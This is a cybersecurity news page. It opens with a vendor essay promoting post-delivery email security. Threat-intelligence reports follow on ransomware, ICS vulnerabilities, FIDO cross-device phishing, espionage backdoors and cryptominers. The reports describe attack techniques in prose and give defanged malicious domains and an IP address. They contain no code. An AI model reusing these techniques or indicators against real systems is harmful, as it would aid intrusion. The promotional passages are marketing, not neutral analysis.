Tag: Cyber Security

Picture this: you’ve hardened every laptop in your fleet with real‑time telemetry, rapid isolation, and automated rollback. But the corporate mailbox—the front door for most attackers—is still guarded by what is effectively a 1990s-era filter.

This isn’t a balanced approach. Email remains a primary vector for breaches, yet we often treat it as a static stream of messages instead of a dynamic, post-delivery environment. This environment is rich with OAuth tokens, shared drive links, and years of sensitive data.

The conversation needs to shift. We should stop asking, “Did the gateway block the bad thing?” and start asking, “How quickly can we see, contain, and undo the damage when an attacker inevitably gets in?”

Looking at email security through this lens forces a fundamental shift toward the same assume-breach, detect-and-respond mindset that already revolutionized endpoint protection.

The day the wall crumbled

Most security professionals know the statistics. Phishing and credential theft continue to dominate breach reports, and the financial impact of Business Email Compromise often outweighs ransomware. But the data tells a more interesting story, one that mirrors the decline of legacy antivirus.

A decade ago, AV was good at catching known threats, but zero-day exploits and novel malware slipped past. Endpoint Detection and Response (EDR) emerged because teams needed visibility after an attacker was already on the machine.

Email is following the same script. Secure Email Gateways (SEGs) still filter spam and commodity phishing campaigns reasonably well. What they miss are the attacks that define the modern threat landscape:

• Payload-less Business Email Compromise (BEC)
• Malicious links that are weaponized after delivery
• Account takeovers using stolen credentials that involve no malware at all

In the endpoint world, the breakthrough wasn’t a better blacklist. It was the realization that prevention must be paired with continuous visibility and fast, automated response. EDR platforms gave us the ability to record process trees, registry changes, and network calls. When a threat was detected, a host could be isolated and changes could be rolled back, all from a single console.

Now imagine giving email administrators the same super‑powers: a rewind button for messages, OAuth scopes and file shares; the ability to freeze—or at least MFA‑challenge—a mailbox the instant a risky rule is created; and a timeline that shows who read which sensitive thread after credentials were stolen.

This combination of capabilities is what a modern, EDR-like approach to email security provides. It’s a simple idea: assume an attacker will eventually land in a mailbox and build the tooling needed to detect, investigate, and contain the fallout.

The API-first moment that made it possible

For years, adding post-delivery controls to email required fragile journaling configurations or heavyweight endpoint agents. The cloud suites quietly solved this problem for us.

Microsoft Graph and Google’s Workspace APIs now expose the necessary telemetry—mailbox audit logs, message IDs, sharing events, and permission changes—securely over OAuth. The same APIs that provide visibility also provide control. They can revoke a token, pull a delivered message from every inbox, or remove a forwarding rule in seconds.

The sensors and the actuators are already baked into the platform. We just need to connect them to a workflow that feels like EDR. As we’ve argued in our post, The Evolution of Email Security, this richness of telemetry is what allows security teams to move beyond the whack-a-mole of tuning filter rules. Instead of waiting for a user to report a phish, the platform can notice an impossible-travel sign-in, see that the account immediately created five new sharing links, and automatically remediate the risk.

Why this matters for lean security teams

A Director of Security at a small or even mid-size company is often the entire security department, juggling vulnerability management, incident response, and compliance. Tool sprawl is the enemy.

An EDR-like approach to email collapses several fragmented controls—SEG policy, DLP, incident response playbooks, SaaS-to-SaaS monitoring—into a single surface. There are no MX record changes, no agents to deploy, and no dependency on users clicking a “report phish” button.

More importantly, it produces metrics that matter. Instead of citing an arbitrary “catch rate,” you can answer board-level questions with concrete data:

• How quickly do we detect a compromised mailbox?
• How much sensitive data was accessible before containment?
• How many risky OAuth grants were revoked this quarter?

These numbers describe actual risk reduction, not theoretical filter efficacy.

A pragmatic way to move forward

This doesn’t have to be an abstract exercise. The path forward is incremental, and each step provides a tangible security benefit.

1. Enable native audit logs. Both Microsoft 365 and Google Workspace include extensive logging. This is the ground truth you’ll need for any future automation.
2. Centralize your telemetry. In your SIEM or log platform, start looking for signals of compromise: sudden mail rule creation, mass file downloads, unusual sign-in locations, and new OAuth grants.
3. Test automated response. Use the native APIs to test “message clawback” with a phishing simulation. Both Microsoft Graph and the Gmail API offer these endpoints out of the box.
4. Evaluate dedicated platforms. Judge them on their breadth of coverage, the sophistication of their post-compromise playbooks, and the speed between detection and automated action.

This journey turns guesswork into evidence, a live breach into a contained incident, and keeps the human effort required proportional to your team’s size.

The bottom line

No one in 2025 would argue that endpoint antivirus is sufficient on its own. We assume prevention will eventually be bypassed, so we build for detection and response. Email deserves the same pragmatic approach.

Of course inbound detection remains critical. But if your security stack can’t also tell you who read a sensitive contract after a mailbox takeover or prevent that exposure automatically then you are still operating in the antivirus era. The attackers have moved on. Your inbox, like your laptop, is ready for an upgrade.

Where Material Security fits in

Material Security was built on the premise we’ve explored here: email is a dynamic, high-value environment that needs post-delivery defenses, not just another pre-delivery filter.

Because Material integrates directly with Microsoft 365 and Google Workspace via their native APIs, deployment takes hours, not months, with no disruption to mail flow.

Once connected, Material records the same fine‑grained telemetry that powers EDR on the endpoint—every mailbox rule, OAuth grant, file share, and sign‑in event—then layers on automated playbooks that shrink a breach window from days to minutes. A suspicious sign‑in can trigger a just‑in‑time MFA challenge, while delivered phish are clawed back across every inbox before they’re even read. Historic mail is wrapped in zero‑knowledge encryption that forces re‑authentication, so stolen credentials alone can’t unlock years of sensitive data.

Perhaps most importantly for security teams of one, Material folds these controls into a single, searchable timeline. You can answer board‑level questions—What was accessed? Who saw it? How quickly did we contain it?—without stitching together half a dozen logs.

In short, Material brings the “assume breach, detect fast, respond faster” ethos of modern endpoint defense to the inbox, turning email from a perennial blind spot into a fully monitored, rapidly recoverable asset.

Jul 28, 2025Ravie LakshmananCyber Attack / Ransomware

The notorious cybercrime group known as Scattered Spider is targeting VMware ESXi hypervisors in attacks targeting retail, airline, and transportation sectors in North America.

“The group’s core tactics have remained consistent and do not rely on software exploits. Instead, they use a proven playbook centered on phone calls to an IT help desk,” Google’s Mandiant team said in an extensive analysis.

“The actors are aggressive, creative, and particularly skilled at using social engineering to bypass even mature security programs. Their attacks are not opportunistic but are precise, campaign-driven operations aimed at an organization’s most critical systems and data.”

Also called 0ktapus, Muddled Libra, Octo Tempest, and UNC3944, the threat actors have a history of conducting advanced social engineering attacks to obtain initial access to victim environments and then adopting a “living-off-the-land” (LotL) approach by manipulating trusted administrative systems and leveraging their control of Active Directory to pivot to the VMware vSphere environment.

Google said the method, which provides a pathway for data exfiltration and ransomware deployment directly from the hypervisor, is “highly effective,” as it bypasses security tools and leaves few traces of compromise.

The attack chain unfolds over five distinct phases –

According to Palo Alto Networks Unit 42, Scattered Spider actors have not only become adept at social engineering, but also have partnered with the DragonForce (aka Slippery Scorpius) ransomware program, in one instance exfiltrating over 100 GB of data during a two-day period.

To counter such threats, organizations are advised to follow three layers of protections –

• Enable vSphere lockdown mode, enforce execInstalledOnly, use vSphere VM encryption, decommission old VMs, harden the help desk
• Implement phishing-resistant multi-factor authentication (MFA), isolate critical identity infrastructure, avoid authentication loops
• Centralize and monitor key logs, isolate backups from production Active Directory, and make sure they are inaccessible to a compromised administrator

Google is also urging organizations to re-architect the system with security in mind when transitioning from VMware vSphere 7, as it approaches end-of-life (EoL) in October 2025.

“Ransomware aimed at vSphere infrastructure, including both ESXi hosts and vCenter Server, poses a uniquely severe risk due to its capacity for immediate and widespread infrastructure paralysis,” Google said.

“Failure to proactively address these interconnected risks by implementing these recommended mitigations will leave organizations exposed to targeted attacks that can swiftly cripple their entire virtualized infrastructure, leading to operational disruption and financial loss.”

Cybersecurity researchers have discovered over a dozen security vulnerabilities impacting Tridium’s Niagara Framework that could allow an attacker on the same network to compromise the system under certain circumstances.

“These vulnerabilities are fully exploitable if a Niagara system is misconfigured, thereby disabling encryption on a specific network device,” Nozomi Networks Labs said in a report published last week. “If chained together, they could allow an attacker with access to the same network — such as through a Man-in-the-Middle (MiTM) position — to compromise the Niagara system.”

Developed by Tridium, an independent business entity of Honeywell, the Niagara Framework is a vendor-neutral platform used to manage and control a wide range of devices from different manufacturers, such as HVAC, lighting, energy management, and security, making it a valuable solution in building management, industrial automation, and smart infrastructure environments.

It consists of two key components: Platform, which is the underlying software environment that provides the necessary services to create, manage, and run Stations, and Station, which communicates with and controls connected devices and systems.

The vulnerabilities identified by Nozomi Networks are exploitable should a Niagara system be misconfigured, causing encryption to be disabled on a network device and opening the door to lateral movement and broader operational disruptions, impacting safety, productivity, and service continuity.

The most severe of the issues are listed below –

• CVE-2025-3936 (CVSS score: 9.8) – Incorrect Permission Assignment for Critical Resource
• CVE-2025-3937 (CVSS score: 9.8) – Use of Password Hash With Insufficient Computational Effort
• CVE-2025-3938 (CVSS score: 9.8) – Missing Cryptographic Step
• CVE-2025-3941 (CVSS score: 9.8) – Improper Handling of Windows: DATA Alternate Data Stream
• CVE-2025-3944 (CVSS score: 9.8) – Incorrect Permission Assignment for Critical Resource
• CVE-2025-3945 (CVSS score: 9.8) – Improper Neutralization of Argument Delimiters in a Command
• CVE-2025-3943 (CVSS score: 7.3) – Use of GET Request Method With Sensitive Query Strings

With control of the Platform, the attacker could leverage CVE-2025-3944 to facilitate root-level remote code execution on the device, achieving complete takeover. Following responsible disclosure, the issues have been addressed in Niagara Framework and Enterprise Security versions 4.14.2u2, 4.15.u1, or 4.10u.11.

“Because Niagara often connects critical systems and sometimes bridges IoT technology and information technology (IT) networks, it could represent a high-value target,” the company said.

“Given the critical functions that can be controlled by Niagara-powered systems, these vulnerabilities may pose a high risk to operational resilience and security provided the instance has not been configured per Tridium’s hardening guidelines and best practices.”

The disclosure comes as several memory corruption flaws have been discovered in the P-Net C library, an open-source implementation of the PROFINET protocol for IO devices, that, if successfully exploited, could allow unauthenticated attackers with network access to the targeted device to trigger denial-of-service (DoS) conditions.

“Practically speaking, exploiting CVE-2025-32399, an attacker can force the CPU running the P-Net library into an infinite loop, consuming 100% CPU resources,” Nozomi Networks said. “Another vulnerability, tracked as CVE-2025-32405, allows an attacker to write beyond the boundaries of a connection buffer, corrupting memory and making the device entirely unusable.”

The vulnerabilities have been resolved in version 1.0.2 of the library, which was released in late April 2025.

In recent months, several security defects have also been unearthed in Rockwell Automation PowerMonitor 1000, Bosch Rexroth ctrlX CORE, and Inaba Denki Sangyo’s IB-MCT001 cameras that could result in execution of arbitrary commands, device takeover, DoS, information theft, and even remotely access live footage for surveillance.

“Successful exploitation of these vulnerabilities could allow an attacker to obtain the product’s login password, gain unauthorized access, tamper with product’s data, and/or modify product settings,” the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in an advisory for IB-MCT001 flaws.

Cybersecurity firm Expel, in an update shared on July 25, 2025, said it’s retracting its findings about a phishing attack that it said leveraged cross-device sign-in to get around FIDO account protections despite being not in physical proximity to the authenticating client device.

“The evidence does show the targeted user’s credentials (username and password) being phished and that the attacker successfully passed password authentication for the targeted user,” the company said.

“It also shows the user received a QR code from the attacker. This QR code, when scanned by a mobile device, initiates a FIDO Cross-Device Authentication flow, which according to FIDO specification requires local proximity to the device which generated the QR code (the WebAuthn client). When properly implemented, without proximity, the request will time out and fail.”

The company further said that while the attackers managed to breach the password barrier, further analysis of the Okta logs revealed that all subsequent multi-factor authentication (MFA) challenges failed and that the attackers were not granted access to the requested resource.

Queries sent by The Hacker News to Expel asking for clarification on the exact method used to achieve a “bypass” received no responses until now. The original story continues below –

Cybersecurity researchers have disclosed a novel attack technique that allows threat actors to downgrade Fast IDentity Online (FIDO) key protections by deceiving users into approving authentication requests from spoofed company login portals.

FIDO keys are hardware- or software-based authenticators designed to eliminate phishing by binding logins to specific domains using public-private key cryptography. In this case, attackers exploit a legitimate feature—cross-device sign-in—to trick victims into unknowingly authenticating malicious sessions.

The activity, observed by Expel as part of a phishing campaign in the wild, has been attributed to a threat actor named PoisonSeed, which was recently flagged as leveraging compromised credentials associated with customer relationship management (CRM) tools and bulk email providers to send spam messages containing cryptocurrency seed phrases and drain victims’ digital wallets.

“The attacker does this by taking advantage of cross-device sign-in features available with FIDO keys,” researchers Ben Nahorney and Brandon Overstreet said. “However, the bad actors in this case are using this feature in adversary-in-the-middle (AitM) attacks.”

This technique doesn’t work in all scenarios. It specifically targets users authenticating via cross-device flows that don’t enforce strict proximity checks—such as Bluetooth or local device attestation. If a user’s environment mandates hardware security keys plugged directly into the login device, or uses platform-bound authenticators (like Face ID tied to the browser context), the attack chain breaks.

Cross-device sign-in allows users to sign-in on a device that does not have a passkey using a second device that does hold the cryptographic key, such as a mobile phone.

The attack chain documented by Expel commences with a phishing email that lures recipients to log into a fake sign-in page mimicking the enterprise’s Okta portal. Once the victims enter their credentials, the sign-in information is stealthily relayed by the bogus site to the real login page.

The phishing site then instructs the legitimate login page to use the hybrid transport method for authentication, which causes the page to serve a QR code that’s subsequently sent back to the phishing site and presented to the victim.

Should the user scan the QR code with the authenticator app on their mobile device, it allows the attackers to gain unauthorized access to the victim’s account.

“In the case of this attack, the bad actors have entered the correct username and password and requested cross-device sign-in,” Expel said.

“The login portal displays a QR code, which the phishing site immediately captures and relays back to the user on the fake site. The user scans it with their MFA authenticator, the login portal and the MFA authenticator communicate, and the attackers are in.”

What makes the attack noteworthy is that it gets around protections offered by FIDO keys and enables threat actors to obtain access to users’ accounts. The compromise method does not exploit any flaw in the FIDO implementation. Rather, it abuses a legitimate feature to downgrade the authentication process.

While FIDO2 is designed to resist phishing, its cross-device login flow—known as hybrid transport—can be misused if proximity verification like Bluetooth is not enforced. In this flow, users can log in on a desktop by scanning a QR code with a mobile device that holds their passkey.

However, attackers can intercept and relay that QR code in real time via a phishing site, tricking users into approving the authentication on a spoofed domain. This turns a secure feature into a phishing loophole—not due to a protocol flaw, but due to its flexible implementation.

Expel also said it observed a separate incident where a threat actor enrolled their own FIDO key after compromising an account through a phishing email and resetting the user’s password.

To better protect user accounts, organizations should pair FIDO2 authentication with checks that verify the device being used. When possible, logins should happen on the same device holding the passkey, which limits phishing risk. Security teams should watch for unusual QR code logins or new passkey enrollments. Account recovery options should use phishing-resistant methods, and login screens—especially for cross-device sign-ins—should show helpful details like location, device type, or clear warnings to help users spot suspicious activity.

If anything, the findings underscore the need for adopting phishing-resistant authentication at all steps in an account lifecycle, including during recovery phases, as using an authentication method that’s susceptible to phishing can undermine the entire identity infrastructure.

“AitM attacks against FIDO keys and attacker-controlled FIDO keys are just the latest in a long line of examples where bad actors and defenders up the ante in the fight to compromise/protect user accounts,” the researchers added.

(The story was updated after publication to make it more clear that the attack technique does not bypass FIDO protections and that it likely downgrades the authentication to a method that’s susceptible to phishing. It was updated again on July 26, 2025, with information about Expel recanting its findings.)

Jul 25, 2025Ravie LakshmananMalware / Threat Intelligence

The threat actor known as Patchwork has been attributed to a new spear-phishing campaign targeting Turkish defense contractors with the goal of gathering strategic intelligence.

“The campaign employs a five-stage execution chain delivered via malicious LNK files disguised as conference invitations sent to targets interested in learning more about unmanned vehicle systems,” Arctic Wolf Labs said in a technical report published this week.

The activity, which also singled out an unnamed manufacturer of precision-guided missile systems, appears to be geopolitically motivated as the timing coincides amid deepening defense cooperation between Pakistan and Türkiye, and the recent India-Pakistan military skirmishes.

Patchwork, also called APT-C-09, APT-Q-36, Chinastrats, Dropping Elephant, Operation Hangover, Quilted Tiger, and Zinc Emerson, is assessed to be a state-sponsored actor of Indian origin. Known to be active since at least 2009, the hacking group has a track record of striking entities in China, Pakistan, and other countries in South Asia.

Exactly a year ago, the Knownsec 404 Team documented Patchwork’s targeting entities with ties to Bhutan to deliver the Brute Ratel C4 framework and an updated version of a backdoor called PGoShell.

Since the start of 2025, the threat actor has been linked to various campaigns aimed at Chinese universities, with recent attacks using baits related to power grids in the country to deliver a Rust-based loader that, in turn, decrypts and launches a C# trojan called Protego to harvest a wide range of information from compromised Windows systems.

Another report published by Chinese cybersecurity firm QiAnXin back in May said it identified infrastructure overlaps between Patchwork and DoNot Team (aka APT-Q-38 or Bellyworm), suggesting potential operational connections between the two threat clusters.

The targeting of Türkiye by the hacking group points to an expansion of its targeting footprint, using malicious Windows shortcut (LNK) files distributed via phishing emails as a starting point to kick-off the multi-stage infection process.

Specifically, the LNK file is designed to invoke PowerShell commands that are responsible for fetching additional payloads from an external server (“expouav[.]org”), a domain created on June 25, 2025, that hosts a PDF lure mimicking an international conference on unmanned vehicle systems, details of which are hosted on the legitimate waset[.]org website.

“The PDF document serves as a visual decoy, designed to distract the user while the rest of the execution chain runs silently in the background,” Arctic Wolf said. “This targeting occurs as Türkiye commands 65% of the global UAV export market and develops critical hypersonic missile capabilities, while simultaneously strengthening defense ties with Pakistan during a period of heightened India-Pakistan tensions.”

Among the downloaded artifacts is a malicious DLL that’s launched using DLL side-loading by means of a scheduled task, ultimately leading to the execution of shellcode that carries out extensive reconnaissance of the compromised host, including taking screenshots, and exfiltrating the details back to the server.

“This represents a significant evolution of this threat actor’s capabilities, transitioning from the x64 DLL variants observed in November 2024, to the current x86 PE executables with enhanced command structures,” the company said. “Dropping Elephant demonstrates continued operational investment and development through architectural diversification from x64 DLL to x86 PE formats, and enhanced C2 protocol implementation through impersonation of legitimate websites.”

Jul 25, 2025Ravie LakshmananCybercrime / Insider Threat

The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned a North Korean front company and three associated individuals for their involvement in the fraudulent remote information technology (IT) worker scheme designed to generate illicit revenues for Pyongyang.

The sanctions target Korea Sobaeksu Trading Company (aka Sobaeksu United Corporation), and Kim Se Un, Jo Kyong Hun, and Myong Chol Min for evading sanctions imposed by the U.S. and the United Nations against the Democratic People’s Republic of Korea (DPRK) government.

“Our commitment is clear: Treasury, as part of a whole-of-government effort, will continue to hold accountable those who seek to infiltrate global supply chains and enable the sanctions evasion activities that further the Kim regime’s destabilizing agenda,” said Director of OFAC Bradley T. Smith.

The latest action marks the U.S. government’s continued efforts to dismantle North Korea’s wide-ranging revenue generation schemes and fund its illegal nuclear and ballistic missile programs.

The IT worker scheme, which has mutated into a global threat, entails the DPRK regime dispatching highly skilled IT workers to various locations, including China, Russia, and Vietnam, to obtain remote jobs and infiltrate U.S. companies and elsewhere using a combination of fraudulent documents, stolen identities, and false personas, often with help from facilitators who run laptop farms.

In what has been described as a recurring, if “baffling,” theme, many of these fake workers have been found to use Minions and other Despicable Me characters in social-media profiles and email addresses.

“The DPRK government withholds most of the wages earned by IT workers, generating hundreds of millions of dollars in revenue to support the North Korean regime’s unlawful weapons of mass destruction and ballistic missile programs,” the Treasury said. “In some cases, these DPRK IT workers have introduced malware into company networks to exfiltrate proprietary and sensitive data.”

The development comes merely weeks after OFAC sanctioned Song Kum Hyok, a 38-year-old member of a North Korean hacking group called Andariel, for their role in the IT worker scheme.

In related news, Christina Marie Chapman, 50, of Arizona, was sentenced to 8.5 years in prison for running a laptop farm for IT workers to give the impression that they were working remotely within the U.S. when, in reality, they were logging into those machines remotely. Chapman pleaded guilty earlier this February.

The impacted companies included a top-five major television network, a Silicon Valley technology company, an aerospace manufacturer, an American car maker, a luxury retail store, and a U.S. media and entertainment company. The IT workers also unsuccessfully attempted to land jobs at two different U.S. government agencies.

The U.S. Federal Bureau of Investigation (FBI) seized more than 90 laptops from Chapman’s home during an October 2023 raid. Chapman is also said to have 49 laptops at locations overseas, including multiple shipments to a Chinese city on the North Korean border.

In all, the elaborate counterfeit operation netted more than $17 million in illicit revenue for Chapman and North Korea from October 2020 to October 2023. Chapman has also been ordered to serve three years of supervised release, to forfeit $284,556 that was to be paid to the North Koreans, and to pay a judgment of $176,850.

“Christina Chapman perpetrated a years’ long scheme that resulted in millions of dollars raised for the DPRK regime, exploited more than 300 American companies and government agencies, and stole dozens of identities of American citizens,” said Acting Assistant Attorney General Matthew R. Galeotti of the Justice Department’s Criminal Division.

Jul 25, 2025Ravie LakshmananCyber Espionage / Malware

Russian aerospace and defense industries have become the target of a cyber espionage campaign that delivers a backdoor called EAGLET to facilitate data exfiltration.

The activity, dubbed Operation CargoTalon, has been assigned to a threat cluster tracked as UNG0901 (short for Unknown Group 901).

“The campaign is aimed at targeting employees of Voronezh Aircraft Production Association (VASO), one of the major aircraft production entities in Russia via using товарно-транспортная накладная (TTN) documents — critical to Russian logistics operations,” Seqrite Labs researcher Subhajeet Singha said in an analysis published this week.

The attack commences with a spear-phishing email bearing cargo delivery-themed lures that contain a ZIP archive, within which is a Windows shortcut (LNK) file that uses PowerShell to display a decoy Microsoft Excel document, while also deploying the EAGLET DLL implant on the host.

The decoy document, per Seqrite, references Obltransterminal, a Russian railway container terminal operator that was sanctioned by the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) in February 2024.

EAGLET is designed to gather system information and establish a connection to a hard-coded remote server (“185.225.17[.]104”) in order to process the HTTP response from the server and extract the commands to be executed on the compromised Windows machine.

The implant supports shell access and the ability to upload/download files, although the exact nature of the next-stage payloads delivered through this method is unknown, given that the command-and-control (C2) server is currently offline.

Seqrite said it also uncovered similar campaigns targeting the Russian military sector with EAGLET, not to mention source code and targeting overlaps with another threat cluster tracked as Head Mare that’s known to target Russian entities.

This includes the functional parallels between EAGLET and PhantomDL, a Go-based backdoor with a shell and file download/upload feature, as well as the similarities in the naming scheme used for the phishing message attachments.

The disclosure comes as the Russian state-sponsored hacking group called UAC-0184 (aka Hive0156) has been attributed to a fresh attack wave targeting victims in Ukraine with Remcos RAT as recently as this month.

While the threat actor has a history of delivering Remcos RAT since early 2024, newly spotted attack chains distributing the malware have been simplified, employing weaponized LNK or PowerShell files to retrieve the decoy file and the Hijack Loader (aka IDAT Loader) payload, which then launches Remcos RAT.

“Hive0156 delivers weaponized Microsoft LNK and PowerShell files, leading to the download and execution of Remcos RAT,” IBM X-Force said, adding it “observed key decoy documents featuring themes that suggest a focus on the Ukrainian military and evolving to a potential wider audience.”

Jul 25, 2025Ravie LakshmananMalware / Cloud Security

Threat hunters have disclosed two different malware campaigns that have targeted vulnerabilities and misconfigurations across cloud environments to deliver cryptocurrency miners.

The threat activity clusters have been codenamed Soco404 and Koske by cloud security firms Wiz and Aqua, respectively.

Soco404 “targets both Linux and Windows systems, deploying platform-specific malware,” Wiz researchers Maor Dokhanian, Shahar Dorfman, and Avigayil Mechtinger said. “They use process masquerading to disguise malicious activity as legitimate system processes.”

The activity is a reference to the fact that payloads are embedded in fake 404 HTML pages hosted on websites built using Google Sites. The bogus sites have since been taken down by Google.

Wiz posited that the campaign, which has been previously observed going after Apache Tomcat services with weak credentials, as well as susceptible Apache Struts and Atlassian Confluence servers using the Sysrv botnet, is part of a broader crypto-scam infrastructure, including fraudulent cryptocurrency trading platforms.

The latest campaign has also been found to target publicly-accessible PostgreSQL instances, with the attackers also abusing compromised Apache Tomcat servers to host payloads tailored for both Linux and Windows environments. Also hacked by the attackers is a legitimate Korean transportation website for malware delivery.

Once initial access is obtained, PostgreSQL’s COPY … FROM PROGRAM SQL command is exploited to run arbitrary shell commands on the host and achieve remote code execution.

“The attacker behind Soco404 appears to be conducting automated scans for exposed services, aiming to exploit any accessible entry point,” Wiz said. “Their use of a wide range of ingress tools, including Linux utilities like wget and curl, as well as Windows-native tools such as certutil and PowerShell, highlights an opportunistic strategy.”

On Linux systems, a dropper shell script is executed directly in memory to download and launch a next-stage payload, while simultaneously taking steps to terminate competing miners to maximize financial gain and limit forensic visibility by overwriting logs associated with cron and wtmp.

The payload executed in the next-stage is a binary that serves as a loader for the miner by contacting an external domain (“www.fastsoco[.]top”) that’s based on Google Sites.

The attack chain for Windows leverages the initial post-exploitation command to download and execute a Windows binary, which, like its Linux counterpart, functions akin to a loader that embeds both the miner and the WinRing0.sys driver, the latter being used to obtain NTSYSTEM privileges.

On top of that, the malware attempts to stop the Windows event log service and executes a self-deletion command to evade detection.

“Rather than relying on a single method or operating system, the attacker casts a wide net, deploying whichever tool or technique is available in the environment to deliver their payload,” the company said. “This flexible approach is characteristic of a broad, automated cryptomining campaign focused on maximizing reach and persistence across varied targets.”

The discovery of Soco404 dovetails with the emergence of a new Linux threat dubbed Koske that’s suspected to be developed with assistance from a large language model (LLM) and uses seemingly innocuous images of pandas to propagate the malware.

The attack starts with the exploitation of a misconfigured server, such as JupyterLab, to install various scripts from two JPEG images, including a C-based rootkit that’s used to hide malicious malware-related files using LD_PRELOAD and a shell script that ultimately downloads cryptocurrency miners on the infected system. Both payloads are directly executed in memory to avoid leaving traces on disk.

Koske’s end goal is to deploy CPU and GPU-optimized cryptocurrency miners that take advantage of the host’s computational resources to mine 18 distinct coins, such as Monero, Ravencoin, Zano, Nexa, and Tari, among others.

“These images are polyglot files, with malicious payloads appended to the end. Once downloaded, the malware extracts and executes the malicious segments in memory, bypassing antivirus tools,” Aqua researcher Assaf Morag said.

“This technique isn’t steganography but rather polyglot file abuse or malicious file embedding. This technique uses a valid JPG file with malicious shellcode hidden at the end. Only the last bytes are downloaded and executed, making it a sneaky form of polyglot abuse.”

Jul 25, 2025The Hacker NewsArtificial Intelligence / Data Privacy

A recent analysis of enterprise data suggests that generative AI tools developed in China are being used extensively by employees in the US and UK, often without oversight or approval from security teams. The study, conducted by Harmonic Security, also identifies hundreds of instances in which sensitive data was uploaded to platforms hosted in China, raising concerns over compliance, data residency, and commercial confidentiality.

Over a 30-day period, Harmonic examined the activity of a sample of 14,000 employees across a range of companies. Nearly 8 percent were found to have used China-based GenAI tools, including DeepSeek, Kimi Moonshot, Baidu Chat, Qwen (from Alibaba), and Manus. These applications, while powerful and easy to access, typically provide little information on how uploaded data is handled, stored, or reused.

The findings underline a widening gap between AI adoption and governance, especially in developer-heavy organizations where time-to-output often trumps policy compliance.

If you’re looking for a way to enforce your AI usage policy with granular controls, contact Harmonic Security.

Data Leakage at Scale

In total, over 17 megabytes of content were uploaded to these platforms by 1,059 users. Harmonic identified 535 separate incidents involving sensitive information. Nearly one-third of that material consisted of source code or engineering documentation. The remainder included documents related to mergers and acquisitions, financial reports, personally identifiable information, legal contracts, and customer records.

Harmonic’s study singled out DeepSeek as the most prevalent tool, associated with 85 percent of recorded incidents. Kimi Moonshot and Qwen are also seeing uptake. Collectively, these services are reshaping how GenAI appears inside corporate networks. It’s not through sanctioned platforms, but through quiet, user-led adoption.

Chinese GenAI services frequently operate under permissive or opaque data policies. In some cases, platform terms allow uploaded content to be used for further model training. The implications are substantial for firms operating in regulated sectors or handling proprietary software and internal business plans.

Policy Enforcement Through Technical Controls

Harmonic Security has developed tools to help enterprises regain control over how GenAI is used in the workplace. Its platform monitors AI activity in real time and enforces policy at the moment of use.

Companies have granular controls to block access to certain applications based on their HQ location, restrict specific types of data from being uploaded, and educate users through contextual prompts.

Governance as a Strategic Imperative

The rise of unauthorized GenAI use inside enterprises is no longer hypothetical. Harmonic’s data show that nearly one in twelve employees is already interacting with Chinese GenAI platforms, often with no awareness of data retention risks or jurisdictional exposure.

The findings suggest that awareness alone is insufficient. Firms will require active, enforced controls if they are to enable GenAI adoption without compromising compliance or security. As the technology matures, the ability to govern its use may prove just as consequential as the performance of the models themselves.

Harmonic makes it possible to embrace the benefits of GenAI without exposing your business to unnecessary risk.

Learn more about how Harmonic helps enforce AI policies and protect sensitive data at harmonic.security.

Jul 24, 2025Ravie LakshmananVirtualization / Network Security

Virtualization and networking infrastructure have been targeted by a threat actor codenamed Fire Ant as part of a prolonged cyber espionage campaign.

The activity, observed this year, is primarily designed Now to infiltrate organizations’ VMware ESXi and vCenter environments as well as network appliances, Sygnia said in a new report published today.

“The threat actor leveraged combinations of sophisticated and stealthy techniques creating multilayered attack kill chains to facilitate access to restricted and segmented network assets within presumed to be isolated environments,” the cybersecurity company said.

“The attacker demonstrated a high degree of persistence and operational maneuverability, operating through eradication efforts, adapting in real time to eradication and containment actions to maintain access to the compromise infrastructure.”

Fire Ant is assessed to share tooling and targeting overlaps with prior campaigns orchestrated by UNC3886, a China-nexus cyber espionage group known for its persistent targeting of edge devices and virtualization technologies since at least 2022.

Attacks mounted by the threat actor have been found to establish entrenched control of VMware ESXi hosts and vCenter servers, demonstrating advanced capabilities to pivot into guest environments and bypass network segmentation by compromising network appliances.

Another noteworthy aspect is the ability of the threat actor to maintain operational resilience by adapting to containment efforts, switching to different tools, dropping fallback backdoors for persistence, and altering network configurations to re-establish access to compromised networks.

Fire Ant’s breach of the virtualization management layer is achieved by the exploitation of CVE-2023-34048, a known security flaw in VMware vCenter Server that has been exploited by UNC3886 as a zero-day for years prior to it being patched by Broadcom in October 2023.

“From vCenter, they extracted the ‘vpxuser’ service account credentials and used them to access connected ESXi hosts,” Sygnia noted. “They deployed multiple persistent backdoors on both ESXi hosts and the vCenter to maintain access across reboots. The backdoor filename, hash and deployment technique aligned the VIRTUALPITA malware family.”

Also dropped is a Python-based implant (“autobackup.bin”) that provides remote command execution, and file download and upload capabilities. It runs in the background as a daemon.

Upon gaining unauthorized access to the hypervisor, the attackers are said to have leveraged another flaw in VMware Tools (CVE-2023-20867) to interact directly with guest virtual machines via PowerCLI, as well as interfered with the functioning of security tools and extracted credentials from memory snapshots, including that of domain controllers.

Some of the other crucial aspects of the threat actor’s tradecraft are as follows –

• Dropping V2Ray framework to facilitate guest network tunneling
• Deploying unregistered virtual machines directly on multiple ESXi hosts
• Breaking down network segmentation barriers and establishing cross-segments persistence
• Resist incident response and remediation efforts by re-compromising assets and, in some cases, blend in by renaming their payloads to impersonate forensic tools

The attack chain ultimately opened up a pathway for Fire Ant to maintain persistent, covert access from the hypervisor to guest operating systems. Sygnia also described the adversary as possessing a “deep understanding” of the target environment’s network architecture and policies in order to reach otherwise isolated assets.

Fire Ant is unusually focused on remaining undetected and leaves a minimal intrusion footprint. This is evidenced in the steps taken by the attackers to tamper with logging on ESXi hosts by terminating the “vmsyslogd” process, effectively suppressing an audit trail and limiting forensic visibility.

The findings underscore a worrying trend involving the persistent and successful targeting of network edge devices by threat actors, particularly those from China, in recent years.

“This campaign underscores the importance of visibility and detection within the hypervisor and infrastructure layer, where traditional endpoint security tools are ineffective,” Sygnia said.

“Fire Ant consistently targeted infrastructure systems such as ESXi hosts, vCenter servers, and F5 load balancers. The targeted systems are rarely integrated into standard detection and response programs. These assets lack detection and response solutions and generate limited telemetry, making them ideal long-term footholds for stealthy operation.”